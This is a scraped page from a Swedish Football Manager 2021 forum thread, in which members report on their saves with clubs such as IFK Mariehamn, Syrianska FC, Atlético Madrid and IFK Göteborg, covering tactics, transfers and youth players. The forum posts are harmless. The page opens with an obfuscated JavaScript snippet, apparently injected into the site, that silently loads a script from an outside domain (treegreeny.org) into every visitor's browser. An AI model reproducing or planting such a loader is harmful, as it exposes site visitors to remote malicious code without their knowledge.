;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 13 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...
 
Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

324 Inlägg
79 Users
472 Reactions
23.3 K Visningar
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Lite jämnare den här säsongen då vi inte har kommit upp i nivå riktigt, men det gör det lite mer intressant bara. CL racet lever och nerflyttningsstriden blir kul. Milan är förskräckliga


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

   

IFK MARIEHAMN
SÄSONG 3 | Ligan: 1/12 | Cupen: Vinnare | ECL: Tvåa i gruppen

Under min tredje säsong hämtade vi mest in några anonyma talanger men där framförallt två spelare stack ut. U21-landslagsmannen OLIVER ANTMAN hämtades in för ynka 380k från Nordsjaelland och Finlands största talang JOUKO THURLING valde att lämna HJK för Åland och Mariehamn då huvudstadsklubben HJK dröjt med att erbjuda anfallaren ett proffsavtal. Under hösten fick vi även fram en egen talang som troligtvis är Lukas Hradeckys ersättare i landslaget. HENRIK LINDQVIST är namnet på vårt superlöfte som givetvis tar hand om förstaspaden omgående. Ut från klubben lämnade färöingen POUL KALLSBERG för Djurgården och mittbacksgeneralen JUUSO HÄMÄLÄINEN för arabvärlden.

Vi ville inte vara sämre än föregående år och kunde återigen jogga hem ligan och ta hem cupen. Vi presterade dock rätt mediokert i ligaspelet i perioder och tog slutligen hela nio poäng färre än i fjol. Vi mäktade dock med något nytt i år då vi tog oss till Europa Conference League efter att ha åkt ut mot BATE i CL-kvalet och Ferencvaros i EL-playoff. Väl där gör vi det helt okej och lyckas på något otroligt sätt ta oss vidare från gruppen trots att vi endast plockar 8 poäng och har -2 i målskillnad. Utöver Mariehamn innehöll gruppen Rosenborg, Astana och Aberdeen. 

Sannolikt blir nästkommande säsong minst sagt händelserik. Under slutskedet av säsongen fick jag ett erbjudande att ta över det finska a-landslaget som i mars månad ska spela play-off-matcher mot Skottland för att nå EM-slutspelet i Tyskland 2024. Givetvis accepterade jag erbjudandet. Med Mariehamn ska vi dessförinnan spela slutspelsmatcher i Europa Conference League under februari månad och senare mot sommaren kvala till Champions League. Vi siktar på att nå åtminstone Europa League och givetvis ta hem ligan för tredje året i följd. På spelarfronten kommer jag försöka rensa ut lite dökött och få in en del finska spelare från de olika landslagen. Vi har tack vare avancemanget till ECL fått större resurser och är nu beredda att investera i såväl organisationen som spelartruppen.

Värvningar: 5 (380k) | Förluster: 2 (9.5 milj) | Saldo: 32 miljoner


   
SvaraCitera
(@roine88)
Active Member
Blev medlem: 4 år sedan
Inlägg: 9
 
Postad av: @hypno

 

Andra viktiga spelare: Eric Smith, Elias Andersson, Alexander Fransson, Victor Edvardsen

Fem största värvningarna, totalt sett:
Frank Onyeka från FC Midtjylland för 15 000 000:-
Riccieli från FC Famalicão för 14 000 000:-
Andreas Linde från Molde för 13 000 000:-
Eric Smith från KAA Gent för 13 000 000:-
Daleho Irandust från Häcken för 11 000 000:-

Fem största försäljningarna, totalt sett:
Manasse Kusu till Watford för 150 000 000:-
Isak Bergmann Johannesson till Shandong Luneng för 130 000 000:-
Sead Haksabanovic till Atletico Madrid för 50 000 000:-
Jonathan Levi till Krasnodar för 44 000 000:-
Linus Wahlqvist till Krasnodar för 38 000 000:-

Finns det möjlighet till screens på Brorsson, Olsson, Irandust, Selmani, Kusu och Johannesson? Tack!

 


   
SvaraCitera
Hypno
(@hypno)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 34
Topic starter  
Postad av: @roine88
Postad av: @hypno

 

Andra viktiga spelare: Eric Smith, Elias Andersson, Alexander Fransson, Victor Edvardsen

Fem största värvningarna, totalt sett:
Frank Onyeka från FC Midtjylland för 15 000 000:-
Riccieli från FC Famalicão för 14 000 000:-
Andreas Linde från Molde för 13 000 000:-
Eric Smith från KAA Gent för 13 000 000:-
Daleho Irandust från Häcken för 11 000 000:-

Fem största försäljningarna, totalt sett:
Manasse Kusu till Watford för 150 000 000:-
Isak Bergmann Johannesson till Shandong Luneng för 130 000 000:-
Sead Haksabanovic till Atletico Madrid för 50 000 000:-
Jonathan Levi till Krasnodar för 44 000 000:-
Linus Wahlqvist till Krasnodar för 38 000 000:-

Finns det möjlighet till screens på Brorsson, Olsson, Irandust, Selmani, Kusu och Johannesson? Tack!

 

Japp! Har en sparfil kvar från nästan exakt när inlägget skrevs. 

Brorsson

Olsson

Irandust

Selmani

Kusu

Johannesson


   
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare
Blev medlem: 4 år sedan
Inlägg: 287
 

Dragit igång med fina Atlético Madrid. Vill putta ner dom stora drakarna och fostra Spaniens nästa stora generation.

Första säsongen får ses som oerhört lyckad! Vi går och vinner La Liga med 4p ner till Real Madrid som brakade ihop fullständigt under slutet utav säsongen. Tre kryss och en förlust på deras fyra sista matcher och uttåg ur CL i åttondelsfinalen.

För egen del blev CL en hyfsad lätt resa fram till semifinalen där vi fick stöta på Liverpool. Med häng på ligatiteln och flera skador fick jag tyvärr "vaska" CL denna säsongen och åkte därför ut med 0-3 sammanlagt. Sett till CL-pengar och att vi vann ligan så gjorde jag rätt prioriteringar med facit i hand.

I Copa del Rey gick vi hela vägen till finalen där vi åkte på stryk mot vira stadsrivaler Real Madrid med 2-1. Avgörande kom i 87:e minuten så det var riktigt surt.

Inför säsong två så har laget förstärkts och ser ut enligt följande:

Jan Oblak
Ricardo Pereira-José Gimenez-Mario Hermoso-Renan Lodi
Marcos Llorente-Eduardo Camavinga-Saul-Koke
Luis Suárez-Joao Felix


   
SvaraCitera
Jimpacool
(@jimpacool)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 17
 

@peter-hecktor

Fina nyförvärv inför nästa säsong. 
Hur många baljor sprutade Suarez in under första säsongen ?


   
SvaraCitera
(@pata91)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

Spelar med BP. Är nu inne på andra säsongen och spelar i Superettan efter att ha vunnit Ettan norra tämligen enkelt. Även om jag vann serien hade jag i början problem med att hitta en vägvinnande taktik. Försökte först spela med en extrem Gegenpress men blev ofta sönderkontrad med enkla genomskärare. Ändrade till en simpel "direkt" tiki taka och kunde med den taktiken vinna de flesta matcher och säkra avancemang. Jag var fortfarande inte nöjd och visste att jag skulle behöva ändra taktik igen till nästa säsong i Superettan. 

Några lyckade värvningar (som mina två scouter lyckades nosa fram) och en framgångsrik klassisk tiki-takataktik med några få modifikationer gör att jag efter 7 omgångar leder Superettan på 19p. Överlägset bollinnehav i samtliga matcher, bättre xG och överlag rättvisa vinster. Jag hade lite tur med krysset borta mot Helsingborg (0-0) men annars har jag vunnit rättvist i samtliga matcher. Jag är lite orolig över vad jag ska göra när det till slut börjar gå tyngre eftersom jag ofta har svårt att ändra taktik (framgångsrikt) under matchen. 


   
SvaraCitera
Peter Hecktor
(@peter-hecktor)
Ägare
Blev medlem: 4 år sedan
Inlägg: 287
 
Postad av: @jimpacool

@peter-hecktor

Fina nyförvärv inför nästa säsong. 
Hur många baljor sprutade Suarez in under första säsongen ?

 


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

:: SÖDERTÄLJES NYA TALANGFABRIK
SYRIANSKA FC - SÄSONG 1

Tack vare LeoFM här på forumet så tog jag tillslut tag i mina tankar om att köra en save där jag enbart får använda mig av egna produkter. Lagvalet föll på Syrianska FC, ett lag i spillror och som trots att man under det senaste decenniet tillhört antingen Allsvenskan eller Superettan nu återfinns i Division 2. Under säsongen värvade jag hem våra förlorade söner Mattias Mete, Rabi Elia och Alexander Varli. Anders Bååth och Felix Michel är för övrigt två andra EP som vi vill få hem på sikt. 

Säsongen gick helt okej, i alla fall om man ser till att vi var tippade att hamna i botten och kraven från styrelsen låg därefter. Vi hamnar tillslut på en sjundeplacering efter att ha visat upp stora toppar men alldeles för djupa dalar. Till nästa säsong bör vår unga trupp (snittålder 22 år) ha tagit ytterligare ett steg i utvecklingen, men jag har svårt och se hur dessa begränsade fotbollsspelare ska kunna knipa en topplacering.  

TALANGFABRIKEN
Då seniorlaget är en skugga av sitt forna jag och U19-laget bestod av endast "gråa" spelare så hade jag givetvis stora förhoppningar på att vår första årskull skulle vara något alldeles extra. Dessvärre blev det raka motsatsen där svenskgambianen Ebrima Barrow får anses vara den enda talangfulla i skaran i skrivande stund. Ytterligare 15 ungdomar fick dock ungdomsavtal signerade och därmed har vårt U19-lag i alla fall en fullgod trupp till att spela tävlingsmatcher.    


   
LeoFM reacted
SvaraCitera
FMViktor91
(@fmviktor91)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 102
 

@roine88

På början av  av saven med Peking kan man sälja 

Ishaq Abdulrazak för 35 miljoner till Kina. Snabba cash. 


   
SvaraCitera
(@janze)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Ipswich Town, andra säsongen i PL. Har ett roligt projekt på g med många egna produkter (halva startelvan just nu) och en taktik byggd på extremt mycket bollinnehav. SOM man älskar inverterade ytterbackar!


   
SvaraCitera
Daniel Olsson
(@fidodk)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 21
 

Kör som vanligt med Mjällby AIF och senaste FMSU.

Har fått in några spelare på fritransfer men låter ungtupparna komma upp och testa på senior fotbollen. 

Jag kör en 5-3-2 taktik med fokus på kontring och än så länge så fungerar taktiken fantastiskt och spelarna levererar okej. Fick tag på två stycken sydafrikanska managers som får hoppa in och styra U-19 laget och reservlaget. Dom besitter ganska så mycket förmåga och styr lagen med järnhand. 

Med vänlig hälsning/
Daniel


   
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 200
 

Lirar med Portsmouth och får inte värva spelare. Alltså endast förlita mig på ungdomsintagen. 

Gått upp från L1 till PL, men åkte ur första säsongen där. Kom till slut på en 18e plats med 33 inspelade poäng.
Framför mig hade jag två lag till på 33 poäng, men med lite bättre målskillnad. 
Surt. 

Ligger just nu 3a i CS. 
Play up Pompey! ❤️ 


   
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

:: SÖDERTÄLJES NYA TALANGFABRIK
SYRIANSKA FC - SÄSONG 2

 

Även i år hade vi svårt att hitta någon vidare stabilitet resultatmässigt. Men sett till statistiken så för vi numera matcherna på ett helt annat sätt i alla fall och det lovar gott inför framtiden. Kan vi bara byta ut alla kryss (mest oavgjorda i hela serien) till segrar så kommer vi snart vara närmare toppen och avancemang till Division 1. Då gäller det dock att vår silverrygg, Mattias Mete, får mer hjälp och slipper bära offensiven på egen hand. Trots en ålder på 35 år mäktade han med hela 20 mål på 25 matcher och är därmed vår främsta målskytt genom tiderna.

En annan höjdpunkt är att vi visade våra supportrar vilka som styr och ställer i Södertälje då vi gick obesegrade från mötena (1-1 & 3-1) mot vår bittra rival Assyriska FF, som åkte ut Division 1 med dunder och brak under den föregående säsongen. Till nästa säsong blir det troligtvis ännu ett derby då det står klart att IK United åker ut Division 1. 

TALANGFABRIKEN

Sådana seniorer sådana juniorer. Vårt U19-lag mäktade även dem med bedriften att kryssa mest i serien och knipa en plats i mittenskiktet. Här ställdes man dock mot betydligt tuffare motstånd i klubbar som Trelleborg, Västerås och BK Forward. 

Årets skara med ungdomskandidater visade sig inte bli något annat än en enda stor succé om man ska tro mina hjälptränare. Magnus Oscarsson anses vara den främsta och han kommer omgående att ges en startplats i a-laget. Detta då spelaren med flest ligamatcher för föreningen, Rabi Elia, nu väljer att lägga skorna på hyllan. 219 ligamatcher blev det för SFC. Då, nu och för alltid en ikon. 


   
raca14, LeoFM and Kristijan reacted
SvaraCitera
(@pcch7)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 57
 

Sinnessjuk inledning på den här matchen

 


   
SvaraCitera
Patrick92
(@patrick92)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 20
 

Har FM blivit lättare? Spelar med Dynamo Moskva och leder ligan. Slog precis Zenit som ju egentligen är klart bäst i Ryssland. Jag spelar ut dem fullständigt och de spelar nån konstig defensiv 4-4-2 med massa långbollar. Fattar inte varför datorn gör så konstiga saker. 


   
SvaraCitera
stylish97
(@stylish97)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

Lirar med IFK Gbg (Har Hamsik men inte Wendt/Berg-uppdateringen. Hann starta saven innan de blev klara, tyvärr)

 

Vann allsvenskan tämligen komfortabelt 13 poäng före Malmö och Hammarby. Har försökt kanalisera min inre Diego Simeone och försökt skapa en taktik som sliter sönder motståndet med aggressivitet och högt presspel. Försöker göra samma sak nästan varje ny upplaga av FM, men denna upplaga är nog den första där det klickat ordentligt med 3-5-2, i varje fall. Brukar oftast alltid bli en 4-2-3-1 eller 4-3-3 när mina experiment går åt pipan. 

 

Taktiken är en högt pressande, hårt jobbande 3-5-2, som sagt, och uppställningen jag körde oftast var:

 

Vår:

 

Mv: Anestis

 

MB: Bjärsmyr

MB: Erlingmark

MB: C. Johansson

 

Wingback höger: Jallow

Wingback vänster: Kalley

 

Def-spelfördelare: Yusuf

Mezzala höger: Thern

Mezzala vänster: Hamsik

 

Anfallare: Sigthorsson

Anfallare: Robin Söder

 

Höst:

 

Mv: Rinne

 

MB: Bjärsmyr

MB: Erlingmark

MB: C. Johansson

 

Wingback höger: Aiesh

Wingback vänster: Kalley

 

Def-spelfördelare: Wernbloom

Mezzala höger: Thern

Mezzala vänster: Hamsik

 

Anfallare: Marco Da Graca (Lån)

Anfallare: Söder

 

--------------------------------------------

 

Under sommarfönstret hände det en hel del, främst kännetecknande att Alhassan Yusuf och Alexander Jallow såldes för 30 respektive 27 miljoner kr och således räddade vår ganska skenande ekonomi. Som ersättare till Jallow kunde jag värva in Godswill Ekpolo från Häcken som ville lämna, vilket gjorde att jag fick honom billigt(2.5 Mkr). Däremot så spelade han inte så mycket som jag trodde då Hosam Aiseh, som jag satt på att träna som wingback, gjorde det strålande på hösten och kom in i det riktigt bra! Yusufs ersättare var lite "enklare" då vi har många spelare som kan spela på den positionen. Jacob Johansson var tänkt att spela där, men fick i princip hela säsongen förstörd av skador. Pontus Wernbloom, som mest fått agera mezzala-reserv fram till nu, fick rejält med speltid som DSF under hösten och skötte det galant!

Det nyförvärv som kommer ge oss mest på sikt är nog dock min nya sportchef Alex Aguinaga, som också kom under sommaren. Nu har jag inte hans siffror framför mig då jag sitter på jobbet, men hans personlighet är "mönstermedborgare", vilket är det jag helst vill ha hos min sportchef. Hans två första förslag var att låna in Xavi Simons(central mittfältare från Paris SG II) samt Marco Da Graca(anfallare från Juventus). Xavi Simons var väldigt nyttig för oss då han kunde spela på samtliga av våra centrala positioner men Da Graca var en riktig gamechanger. På 13-14 matcher smällde han in 15 mål och var den största anledningen till att vi lyckades springa ifrån i serien såpass långt som vi gjorde. Alldeles för bra för allsvenskan, helt klart.

Övrigt jag tar med mig från säsongen:

  • Erlingmark spelade lysande som mer passningsorienterad mittback.
  • Sigthorsson och Paka Lagemyr gjorde båda 9 mål som anfallare, men är inte de mest skadefria spelarna i mannaminne. En hel säsong på pojkarna så vet man inte hur långt det kan gå!
  • Tobbe Sana och Gustaf Norlin får mest agera inhoppare. Sana spelar mest mezzala som ersättare för Hamsik/Thern och Norlin tränar jag som wingback på vänstersidan.
  • Marek Hamsik ligger en nivå över alla andra, men slits av det tajta spelschemat som händer i allsvenskan. Får vila honom ett par gånger under säsongen, men hamnar ändå på 9+8 poäng med 8 matchens lirare-pris samt högst snittbetyg i laget. Lyckades också förlänga med honom till 2023!!

   
BerganderJ, friggan, raca14 and 2 people reacted
SvaraCitera
(@krelleg)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

@stylish97 - väldigt intressant, tack! Fått fart på någon av talangerna? Dela gärna taktikscreenshots, är på väg att starta upp med Blåvitt!


   
SvaraCitera
stylish97
(@stylish97)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 
Postad av: @krelleg

@stylish97 - väldigt intressant, tack! Fått fart på någon av talangerna? Dela gärna taktikscreenshots, är på väg att starta upp med Blåvitt!

Nja, spelade en del av junisarna i cupen och sådär, men förutom att Vilhelmsson gjorde ett hattrick i någon av matcherna så har i alla fall inte någon av talangerna slagit sig in i startelvan denna säsong, i alla fall. Men Felix Eriksson och Melvin Berg utvecklas väldigt fint och kan mycket väl få speltid under säsong 2.

Vad gäller taktiken(bild skall vara bifogad här) så är den ganska rättfram, tycker jag. Att höger wingback är mer offensiv än vänster beror bara på att Hosam Aiesh är mycket mer wing än back, så att säga. Spelar jag med Ekpolo istället så blir den högra mezzalan istället mer offensiv.

Ytterspringarna och mezzala-positionerna kräver mycket av dina spelare, om du vill ha ett råd. Hamsik har 16 i grundkondis, men han var nere för räkning flertalet gånger under säsongen. Mycket utbytt. Taktiken överlag är väldigt pressande och kräver mycket av spelarna. Men effektiv, tycker jag. Investera i ditt läkarteam och ta det lugnt med träningarna 😉

Ett annat råd är att skita i att träna Aiesh som winback som jag gjorde och istället skola om honom till anfallare. Bra attribut för det, vad jag kan se. Ångrar att jag inte gjorde det själv


   
Micke reacted
SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 155
 

:: SÖDERTÄLJES NYA TALANGFABRIK
SYRIANSKA FC - SÄSONG 3

Den här säsongen var länge på väg att betraktas som en vacker saga. Det visade sig dessvärre inte bli något annat än en enda stor mardröm. Vi satt länge i förarsätet i ligaspelet, men kryssade oss ned till en andraplats. Väl där väntade gruppspel mot IFK Luleå och Enskede i kampen om play-off, där vi efter en 3-0-seger i 90:e minuten mot dem sistnämnda vann gruppen och säkrade avancemanget. Nu väntade 2 matcher mot Täby FK för att nå uppflyttningen. 1-1 gånger två följdes upp med ett rött kort i förlängningen och ett sent förlustmål i den 110:e förlängningsminuten. Surt sade räven och vi får därmed se fram emot ännu ett år i Division 2... 

TALANGFABRIKEN

På U19-fronten såg det desto ljusare ut när ligan kunde vinnas trots krävande motstånd. Jesper Pettersson var vår klart lysande stjärna i serien där han vann skytteligan och hade tredje bäst snittbetyg i serien. Dessvärre är han värdelös attributmässigt.

Om man ska tro mina hjälptränare så har årets ungdomskandidater minst sagt framtiden för sig, där en hel del utav dem har maximalt med stjärnor i potential. Men efter att ha granskat var och en av dem så kan jag bara konstatera att ingen har något i vårt seniorlag och göra på ett tag. 

FÖR ÖVRIGT...
...gick vi obesegrade ur Södertäljederbyna mot Assyriska FF (1-1 & 1-1) och IK United (3-1 & 1-0).
...lägger vår främste ligamålskytt (60 mål) genom tiderna, Mattias Mete, nu skorna på hyllan.
...är vår talang Iilja Banda numera ordinarie U21-landslagsman för Montenegro.


   
raca14, Micke and LeoFM reacted
SvaraCitera
Sida 13 / 17
Share: